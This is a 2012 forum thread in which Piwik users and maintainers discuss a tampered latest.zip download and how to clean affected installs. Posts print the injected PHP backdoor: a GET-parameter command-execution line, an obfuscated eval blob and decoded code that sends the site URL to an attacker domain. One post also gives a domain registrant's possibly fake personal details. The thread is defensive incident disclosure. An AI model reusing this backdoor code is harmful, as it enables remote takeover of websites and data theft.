Welcome! Log In Create A New Profile

ALERT!!!! SECURITY ISSUE: latest.zip is infected

Posted by schnoog 
Forum List Message List New Topic
schnoog [ # ]
November 26, 2012 09:02PM
Please be aware of the newest latest.zip.

Thie file core/Loader.php is infected!! 

eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWEpFGwk4nZr4zkRGQsJn3kMND6jcBgayIKnkIX3n2tu1EieGARMoH3W8NXjBp4JAVQq8GFR/KcAbcyoSfhX9vzeU0R8K3mH313Q4UnAykzj9707HzHZ67PJndpyPSqKHbZ0kLq6N0s5KdDxSKYz7wkwE80mW6e3m3gbz8l0i2jh50b2sRJEnwjxJ1tOjVvumO9RrPHsT9BZNSN0qm2F2TlLDO9EqSNMADWCHW/LmLsvmbn009XNOA38yH6qNUm+a97jyA55xzFpgViGxa2SlN2ObBZQeuxwwL9koc.................................
Reply Quote
elz64 [ # ]
November 26, 2012 09:22PM
The setup returns a warning about its size.

OK

but what should we do ?
Reply Quote
schnoog [ # ]
November 26, 2012 09:49PM
IMO: Don`t install it until a new, safe release is out.
Reply Quote
lawtonca [ # ]
November 26, 2012 10:05PM
What if we have installed it?
Does it create anything we need to be worried about/remove?
Reply Quote
schnoog [ # ]
November 26, 2012 10:28PM
At least delete the code which is evaled.
It seems the code opens a backdoor which allows the offender to run all allowed functions over eval().
Reply Quote
Jeffery [ # ]
November 26, 2012 10:56PM
If you already installed:

1) Remove "piwik/core/DataTable/Filter/Megre.php". This is a general purpose uploading form and shell !!!! EDIT: It's also a shell command launcher...

2) Remove the last 6 lines from "piwik/core/Loader.php": 

<?php Error_Reporting(0); 	if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
  }
  if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode(.....

Which once decoded execute the following code: 

Error_Reporting(0);
$_0=5;
$_1="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";
$_2=$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI'];
$_2=str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']);
$_3="http://prostoivse.com/x.php";
if(file_exists(direname(__FILE__) ."/lic.log"))exit;
function l__0($_4,$_1,$_5,$_6)
{
	$_7=curl_init();
	curl_setopt($_7,CURLOPT_URL,$_4);
	curl_setopt($_7,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
	curl_setopt($_7,CURLOPT_TIMEOUT,$_5);
	curl_setopt($_7,CURLOPT_FOLLOWLOCATION,1);
	curl_setopt($_7,CURLOPT_RETURNTRANSFER,1);
	curl_setopt($_7,CURLOPT_POST,1);
	curl_setopt($_7,CURLOPT_POSTFIELDS,"reff=" .$_6);
	$_8=curl_exec($_7);
	curl_close($_7);
	return $_8;
}

function l__1($_9,$_10,$_11=l__2)
{
	$_12=array("http"=> array("method"=> "POST","content"=> $_10));
	if($_11 !== l__2)
	{
		$_12[http][header]=$_11;
	}
	$_13=stream_context_create($_12);
	$_14=@fopen($_9,rb,false,$_13);
	if(!$_14)
	{
		return false;
	}
	stream_set_timeout($_14,5);
	$_15=@stream_get_contents($_14);
	if($_15 === false)
	{
		return false;
	}
	return $_15;
}

$_16=l__1("http://prostoivse.com/x.php","reff=".str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']));

if($_16 == false)
{
	$_16=l__0("http://prostoivse.com/x.php","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",5,str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']));
}
$_17=fopen((direname(__FILE__) ."/lic.log"),"a+");
fwrite($_17,"piwik" ."\n");
fclose($_17);

This simply send to the hacker the url of the uploading form...

<EDIT> In fact it's even worst than that, the following code: 
preg_replace("/(.+)/e", $_GET['g'], 'dwm');
execute the command given in the g parameter of the url
</EDIT>

3) Try to figure out if any other files have been uploaded with the form (might be hard this error reporting seems to have been turned of)

If you want to reinstall go here: http://builds.piwik.org/ the piwik-1.9.2.tar.gz is not infected (when I'm writting, might get infected later :/) check the date field, it should be from 09-Nov-2012 08:25. /!\ the .zip version is the infected one !!! EDIT: It is probably safer to download it from piwik's github account: https://github.com/piwik/piwik/tags



Edited 3 time(s). Last edit at 11/26/2012 11:42PM by Jeffery.
Reply Quote
Jeffery [ # ]
November 26, 2012 11:01PM
If you want to thanks that guy, the domain name where your piwik url is send is registred by this guy:

Name: Amanda D. Clarke
Organization: Amanda D. Clarke
Address: 1142 Southern Street
City: Glen Cove
Province/state: NY
Country: US
Postal Code: 11542
Email: ebaka@prostoivse.com

(but it might be fake, I don't know the .com registration verification procedure)
Reply Quote
SteveG [ # ]
November 26, 2012 11:41PM
latest.zip should be ok again. We are still checking the reason for that issue and how that "hacker" had the chance to manipulate the file on the server. Sorry for the inconvenience.
Reply Quote
Zizounnette [ # ]
November 27, 2012 10:25AM
plz setup you're ids and ban asap any adresses trying to reach these file.

Check your file asap².

http://www.devquotes.com/2012/11/27/piwik-1-9-2-corrupted-exploit-available/


6ix IT // Le label sécurité de confiance.
http://6ix-it.com
@Zizounnette
Reply Quote
kossmac [ # ]
November 27, 2012 10:59AM
Hi,

we just updated our piwik installations on november 22nd through automatic web-update and were not affected by this problem.
Reply Quote
Zizounnette [ # ]
November 27, 2012 11:01AM
Did you find HOW the malicious code have been injected in this latest.zip file ?


6ix IT // Le label sécurité de confiance.
http://6ix-it.com
@Zizounnette
Reply Quote
IT-Cru [ # ]
November 27, 2012 11:11AM
Automatic upgrade installation from 9th November is also clean on my piwik system.


IT-Cru - Das IT-Gewächs
Web-Entwicklung und IT-Services

http://www.it-cru.de
Reply Quote
SteveG [ # ]
November 27, 2012 11:18AM
Guess we did, but we are still checking the servers. I think we will publish a statement later.

Btw. The infected file was only "available" yesterday for a couple of hours. All updates done before and after that should not be affected.
Reply Quote
Zizounnette [ # ]
November 27, 2012 11:18AM
A friend of mine upgraded the 14th, nothing in sources too .


6ix IT // Le label sécurité de confiance.
http://6ix-it.com
@Zizounnette
Reply Quote
stesind [ # ]
November 27, 2012 11:25AM
Mine autoupdated seems to be clean as well. Can you say when this code came into the repos?
Reply Quote
edvsb [ # ]
November 27, 2012 11:26AM
Download Piwik 1.9.2: 18.11.2012
Code: clean
Reply Quote
SteveG [ # ]
November 27, 2012 11:29AM
The infected code was never in the repository. The infected zip file was placed directly on the server
Reply Quote
elgringo [ # ]
November 27, 2012 11:41AM
Is there a way to determine the exact day and time when the download and installation was done?

Was the webupdate affected too? Or just the manual download? (Maybe it's the same file)
Reply Quote
Achim Lammerts [ # ]
November 27, 2012 12:21PM
My installation is also clean, updated to 1.9.2 at Nov 10, 08:00 h CET


Wert- und Geschenkgutscheine für Ihre Kunden
zum Selbstausdrucken: http://wowjr.biz/
Reply Quote
SteveG [ # ]
November 27, 2012 12:57PM
Here is the official statement: [piwik.org]
Reply Quote
ewuser [ # ]
November 27, 2012 01:27PM
Thanks! Also for the quick handling of the issue.

Curious: Which wordpress plugin?
I use WP with several plugins too and I would like to know which one. To deactivate it.
(If you don't want to tell in public, a private message would be nice)
Reply Quote
Fabian Becker [ # ]
November 27, 2012 02:07PM
Please separate the Download Server from the official Website. Wordpress is known for its security flaws and this can happen again. Setup a separate server just to serve the download archives (e.g. download.piwik.org).


Was I able to help you? Then consider giving me a tip or Flattr smiling smiley

https://www.gittip.com/halfdan | https://flattr.com/profile/halfdan
Reply Quote
Ivan Ivanov [ # ]
November 27, 2012 03:02PM
I'm here to say that you obviously got pwned by so-called Russian Hackers.
Whois details says "Email: ebaka@prostoivse.com"
Well, "prostoivse" gives us "просто и все" which is stands for "it's just simple".
And "ebaka" stands for "f-cker".
Good luck.
Reply Quote
stesind [ # ]
November 27, 2012 03:15PM
Blog, Forum and Downloads should all be separated. Downloads should be signed and the key published by a different server. MD5 hashes can be faked now. Best would be to generate the downloads from GIT repository. Suggest people to clone from your version control instead of downloading from server.
Reply Quote
matt [ # ]
April 20, 2013 11:50AM
We have taken steps to ensure it does not happen again (certainly not that "easily"winking smiley
- we have now separated the downloads to another server at builds.piwik.org
- we setup different SSH accounts for each subdomain so that even if one subdomain is compromised it will not affect others.


Please READ before posting a new topic

Search Piwik Forum & Docs - Piwik FAQ - Piwik Help - Stay tuned on the Piwik Blog. I'm on twitter & on github

New! Help : fund an AWESOME new feature for Piwik (Custom Segmentations Editor + Apply in Real Time!), we need your help!

New: Sponsor a feature or work new plugin. Contact us now with your budget, timeline, and which new feature you would like to fund we will let you know the quote.


Reply Quote
vwyoda [ # ]
April 24, 2013 10:36AM
@Matt was this just an update or did it really take that long to do what you are stating has been done to help recitfy this issue?
Reply Quote
matt [ # ]
April 24, 2013 12:16PM
stating what has been done months ago as I realized I forgot to update this post
Reply Quote
Newer Topic Older Topic
Sorry, only registered users may post in this forum.

Click here to login

Free Forum support is provided by the Piwik Community. If you require any urgent or professional help, contact Piwik Professional Services team!